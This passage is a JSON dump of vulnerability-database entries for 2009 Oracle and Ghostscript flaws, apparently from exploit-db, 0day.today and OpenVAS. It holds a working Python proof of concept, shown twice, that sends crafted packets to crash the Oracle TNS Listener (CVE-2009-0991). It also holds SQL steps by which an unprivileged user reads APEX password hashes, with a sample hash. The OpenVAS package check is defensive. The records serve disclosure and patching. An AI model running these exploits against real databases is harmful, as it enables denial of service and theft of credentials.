1521))\r\n\r\nsockobj.send(\r\n\t\"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00\"\r\n\t\"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45\"\r\n\t\"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44\"\r\n\t\"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65\"\r\n\t\"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29\")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t\"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08\"\r\n\t\"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32\"\r\n\t\"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00\"\r\n\t\"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00\"\r\n\t\"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36\"\r\n\t\"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42\"\r\n\t\"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\"\r\n\t\"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00\"\r\n\t\"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac\"\r\n\t\"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00\"\r\n\t\"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3\"\r\n\t\"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e\"\r\n\t\"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00\"\r\n\t\"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00\"\r\n\t\"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09\"\r\n\t\"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\"\r\n\t\"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\t\"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\"\r\n\t\"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00\"\r\n\t\"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f\"\r\n\t\"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d\"\r\n\t\"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b\"\r\n\t\"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c\"\r\n\t\"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00\"\r\n\t\"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\"\r\n\t\"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00\"\r\n\t\"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43\"\r\n\t\"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d\"\r\n\t\"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72\"\r\n\t\"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e\"\r\n\t\"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61\"\r\n\t\"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f\"\r\n\t\"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d\"\r\n\t\"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c\"\r\n\t\"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22\"\r\n\t\"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22\"\r\n\t\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\"\r\n)\r\n\r\nsockobj.close()\r\n\r\n# milw0rm.com [2009-04-21]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8507/"}, {"lastseen": "2016-02-01T04:34:53", "bulletinFamily": "exploit", "description": "Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes. CVE-2009-0981. Local exploits for multiple platform", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "EDB-ID:8456", "href": "https://www.exploit-db.com/exploits/8456/", "type": "exploitdb", "title": "Oracle APEX 3.2 - Unprivileged DB users can see APEX password hashes", "sourceData": "Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\n\nName \t\t\tUnprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]\nSystems Affected \tAPEX 3.0 (optional component of 11.1.0.7 installation)\nSeverity \t\tHigh Risk\nCategory \t\tPassword Disclosure\nVendor URL \t\thttp://www.oracle.com/\nAuthor \t\t\tAlexander Kornbrust (ak at red-database-security.com)\nCVE \t\t\tCVE-2009-0981\nAdvisory \t\t14 April 2009 (V 1.00)\n\n\nDetails\nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.\nTested on 11.1.0.7.\n\nC:\\> sqlplus dummy/dummy\nConnected to:\nOracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production\nWith the Partitioning, OLAP, Data Mining and Real Application Testing options\n\nSQL> select granted_role from user_role_privs;\n\nGRANTED_ROLE\n------------------------------\nCONNECT\n\n\nSQL> select owner,table_name from all_tables where owner='FLOWS_030000';\n\nOWNER TABLE_NAME\n------------------------------ ------------------------------\nFLOWS_030000 WWV_FLOW_DUAL100\nFLOWS_030000 WWV_FLOW_LOV_TEMP\nFLOWS_030000 WWV_FLOW_TEMP_TABLE\n\n\n\nGet a list of all columns containing the string \"%PASSWORD%'\n\nSQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';\n\nOWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME\n--------------------------------------------------------------------------------\nFLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE\nFLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2\nFLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT\nFLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE\n\n9 rows selected.\n\n\nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS\n\nUSER_NAME WEB_PASSWORD2\n--------------------------------------------------------------------------------\nYURI 141FA790354FB6C72802FDEA86353F31\n\nThis password hash can be checked using a tool like Repscan.\n\n\nPatch Information\nApply the patches for Oracle CPU April 2009.\n\n\nHistory\n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]\n14-apr-2009 Advisory published\n\n# milw0rm.com [2009-04-16]\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/8456/"}], "zdt": [{"lastseen": "2018-02-19T15:26:34", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "id": "1337DAY-ID-6836", "href": "https://0day.today/exploit/description/6836", "type": "zdt", "title": "Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)", "sourceData": "===============================================================\r\nOracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991)\r\n===============================================================\r\n\r\n\r\n\r\n# TNS Listener (Oracle RDBMS) exploit, cause trap in Listener process \r\n# (more precisely: in function memcpy() called from ncrfintn() function which is located in oranro11.dll)\r\n\r\n# Successfully working with Oracle RDBMS Win32 11.1.0.6.0 and Oracle RDBMS Win32 10.2.0.3 with latest CPU patches applied\r\n\r\n# Vulnerability discovered by Dennis Yurichev \r\n\r\n# Fixed in CPUapr2009, CVE-2009-0991\r\n\r\nfrom sys import *\r\nfrom socket import *\r\n\r\nsockobj = socket(AF_INET, SOCK_STREAM)\r\n\r\nsockobj.connect ((argv[1], 1521))\r\n\r\nsockobj.send(\r\n\t\"\\x00\\x68\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x3A\\x01\\x2C\\x00\\x00\\x20\\x00\"\r\n\t\"\\x7F\\xFF\\xC6\\x0E\\x00\\x00\\x01\\x00\\x00\\x2E\\x00\\x3A\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x28\\x43\\x4F\\x4E\\x4E\\x45\"\r\n\t\"\\x43\\x54\\x5F\\x44\\x41\\x54\\x41\\x3D\\x28\\x43\\x4F\\x4D\\x4D\\x41\\x4E\\x44\"\r\n\t\"\\x3D\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x5F\\x72\\x65\\x67\\x69\\x73\\x74\\x65\"\r\n\t\"\\x72\\x5F\\x4E\\x53\\x47\\x52\\x29\\x29\")\r\n\r\ndata=sockobj.recv(102400)\r\n\r\nsockobj.send(\r\n\t\"\\x02\\xde\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xd4\\x20\\x08\"\r\n\t\"\\xff\\x03\\x01\\x00\\x12\\x34\\x34\\x34\\x34\\x34\\x78\\x10\\x10\\x32\\x10\\x32\"\r\n\t\"\\x10\\x32\\x10\\x32\\x10\\x32\\x54\\x76\\x00\\x78\\x10\\x32\\x54\\x76\\x44\\x00\"\r\n\t\"\\x00\\x80\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x70\\xe4\\xa5\\x09\\x90\\x00\"\r\n\t\"\\x23\\x00\\x00\\x00\\x42\\x45\\x43\\x37\\x36\\x43\\x32\\x43\\x43\\x31\\x33\\x36\"\r\n\t\"\\x2d\\x35\\x46\\x39\\x46\\x2d\\x45\\x30\\x33\\x34\\x2d\\x30\\x30\\x30\\x33\\x42\"\r\n\t\"\\x41\\x31\\x33\\x37\\x34\\x42\\x33\\x03\\x00\\x65\\x00\\x01\\x00\\x01\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x64\\x02\\x00\\x80\\x05\\x00\\x00\\x00\\x00\\x04\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\"\r\n\t\"\\x00\\x00\\x84\\xc3\\xcc\\x07\\x01\\x00\\x00\\x00\\x84\\x2f\\xa6\\x09\\x00\\x00\"\r\n\t\"\\x00\\x00\\x44\\xa5\\xa2\\x09\\x25\\x98\\x18\\xe9\\x28\\x50\\x4f\\x28\\xbb\\xac\"\r\n\t\"\\x15\\x56\\x8e\\x68\\x1d\\x6d\\x05\\x00\\x00\\x00\\xfc\\xa9\\x36\\x22\\x0f\\x00\"\r\n\t\"\\x00\\x00\\x60\\x30\\xa6\\x09\\x0a\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\xaa\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x17\\x00\\x00\\x00\\x78\\xc3\"\r\n\t\"\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x28\\x48\\x4f\\x53\\x54\\x3d\\x77\\x69\\x6e\"\r\n\t\"\\x32\\x30\\x30\\x33\\x29\\x00\\x01\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x01\\x00\"\r\n\t\"\\x00\\x00\\x50\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x34\\xc5\\x2f\\x22\\x00\\x00\"\r\n\t\"\\x00\\x00\\x9c\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\\x09\"\r\n\t\"\\x00\\x00\\x00\\x50\\xc5\\x2f\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\"\r\n\t\"\\x58\\x50\\x54\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\t\"\\x84\\xc5\\x2f\\x22\\x02\\x00\\x00\\x00\\x68\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\"\r\n\t\"\\xa4\\xa5\\xa2\\x09\\x6f\\x72\\x63\\x6c\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x01\\x00\\x00\\x00\\x10\\x00\"\r\n\t\"\\x00\\x00\\x02\\x00\\x00\\x00\\xbc\\xc3\\xcc\\x07\\x00\\x00\\x00\\x00\\xb0\\x2f\"\r\n\t\"\\xa6\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x89\\xc0\\xb1\\xc3\\x08\\x1d\"\r\n\t\"\\x46\\x6d\\xb6\\xcf\\xd1\\xdd\\x2c\\xa7\\x66\\x6d\\x0a\\x00\\x00\\x00\\x78\\x2b\"\r\n\t\"\\xbc\\x04\\x7f\\x00\\x00\\x00\\x64\\xa7\\xa2\\x09\\x0d\\x00\\x00\\x00\\x20\\x2c\"\r\n\t\"\\xbc\\x04\\x11\\x00\\x00\\x00\\x95\\x00\\x00\\x00\\x02\\x20\\x00\\x80\\x03\\x00\"\r\n\t\"\\x00\\x00\\x98\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\"\r\n\t\"\\x00\\x00\\xb0\\xc3\\xcc\\x07\\x44\\x45\\x44\\x49\\x43\\x41\\x54\\x45\\x44\\x00\"\r\n\t\"\\x28\\x41\\x44\\x44\\x52\\x45\\x53\\x53\\x3d\\x28\\x50\\x52\\x4f\\x54\\x4f\\x43\"\r\n\t\"\\x4f\\x4c\\x3d\\x42\\x45\\x51\\x29\\x28\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x3d\"\r\n\t\"\\x43\\x3a\\x5c\\x61\\x70\\x70\\x5c\\x41\\x64\\x6d\\x69\\x6e\\x69\\x73\\x74\\x72\"\r\n\t\"\\x61\\x74\\x6f\\x72\\x5c\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x5c\\x31\\x31\\x2e\"\r\n\t\"\\x31\\x2e\\x30\\x5c\\x64\\x62\\x5f\\x31\\x5c\\x62\\x69\\x6e\\x5c\\x6f\\x72\\x61\"\r\n\t\"\\x63\\x6c\\x65\\x2e\\x65\\x78\\x65\\x29\\x28\\x41\\x52\\x47\\x56\\x30\\x3d\\x6f\"\r\n\t\"\\x72\\x61\\x63\\x6c\\x65\\x6f\\x72\\x63\\x6c\\x29\\x28\\x41\\x52\\x47\\x53\\x3d\"\r\n\t\"\\x27\\x28\\x4c\\x4f\\x43\\x41\\x4c\\x3d\\x4e\\x4f\\x29\\x27\\x29\\x29\\x00\\x4c\"\r\n\t\"\\x4f\\x43\\x41\\x4c\\x20\\x53\\x45\\x52\\x56\\x45\\x52\\x00\\x68\\xc5\\x2f\\x22\"\r\n\t\"\\x34\\xc5\\x2f\\x22\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x84\\xc5\\x2f\\x22\"\r\n\t\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\xfc\\xc4\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x00\\x09\\x00\\x00\\x00\\x50\\xc5\\x2f\"\r\n\t\"\\x22\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x34\\xc5\\xcc\\x07\\x6f\\x72\\x63\\x6c\\x5f\\x58\\x50\\x54\\x00\"\r\n)\r\n\r\nsockobj.close()\r\n\r\n\r\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6836"}], "openvas": [{"lastseen": "2017-12-04T11:29:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update to gs-gpl\nannounced via advisory USN-757-1.", "modified": "2017-12-01T00:00:00", "published": "2009-04-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63856", "id": "OPENVAS:63856", "title": "Ubuntu USN-757-1 (gs-gpl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_757_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_757_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-757-1 (gs-gpl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n gs-esp 8.15.2.dfsg.0ubuntu1-0ubuntu1.2\n gs-gpl 8.15-4ubuntu3.3\n\nUbuntu 8.04 LTS:\n libgs8 8.61.dfsg.1-1ubuntu3.2\n\nUbuntu 8.10:\n libgs8 8.63.dfsg.1-0ubuntu6.4\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-757-1\";\n\ntag_insight = \"It was discovered that Ghostscript contained a buffer underflow in its\nCCITTFax decoding filter. If a user or automated system were tricked into\nopening a crafted PDF file, an attacker could cause a denial of service or\nexecute arbitrary code with privileges of the user invoking the program.\n(CVE-2007-6725)\n\nIt was discovered that Ghostscript contained a buffer overflow in the\nBaseFont writer module. If a user or automated system were tricked into\nopening a crafted Postscript file, an attacker could cause a denial of\nservice or execute arbitrary code with privileges of the user invoking the\nprogram. (CVE-2008-6679)\n\nIt was discovered that Ghostscript contained additional integer overflows\nin its ICC color management library. If a user or automated system were\ntricked into opening a crafted Postscript or PDF file, an attacker could\ncause a denial of service or execute arbitrary code with privileges of the\nuser invoking the program. (CVE-2009-0792)\n\nAlin Rad Pop discovered that Ghostscript contained a buffer overflow in the\njbig2dec library. If a user or automated system were tricked into opening a\ncrafted PDF file, an attacker could cause a denial of service or execute\narbitrary code with privileges of the user invoking the program.\n(CVE-2009-0196)\n\nUSN-743-1 provided updated ghostscript and gs-gpl packages to fix two\nsecurity vulnerabilities. This update corrects the same vulnerabilities in\nthe gs-esp package.\n\nOriginal advisory details:\n It was discovered that Ghostscript contained multiple integer overflows in\n its ICC color management library. If a user or automated system were\n tricked into opening a crafted Postscript file, an attacker could cause a\n denial of service or execute arbitrary code with privileges of the user\n invoking the program. (CVE-2009-0583)\n\n It was discovered that Ghostscript did not properly perform bounds\n checking in its ICC color management library. If a user or automated\n system were tricked into opening a crafted Postscript file, an attacker\n could cause a denial of service or execute arbitrary code with privileges\n of the user invoking the program. (CVE-2009-0584)\";\ntag_summary = \"The remote host is missing an update to gs-gpl\nannounced via advisory USN-757-1.\";\n\n \n\n\nif(description)\n{\n script_id(63856);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2008-5259\", \"CVE-2009-0584\", \"CVE-2009-0583\", \"CVE-2009-1012\", \"CVE-2007-6725\", \"CVE-2009-1016\", \"CVE-2009-1185\", \"CVE-2009-0796\", \"CVE-2009-0792\", \"CVE-2009-0196\", \"CVE-2008-6679\", \"CVE-2009-1186\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-757-1 (gs-gpl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-757-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.15-4ubuntu3.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.15.2.dfsg.0ubuntu1-0ubuntu1.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.15-4ubuntu3.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.61.dfsg.1-1ubuntu3.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.63.dfsg.1-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.63.dfsg.1-0ubuntu6.4\", 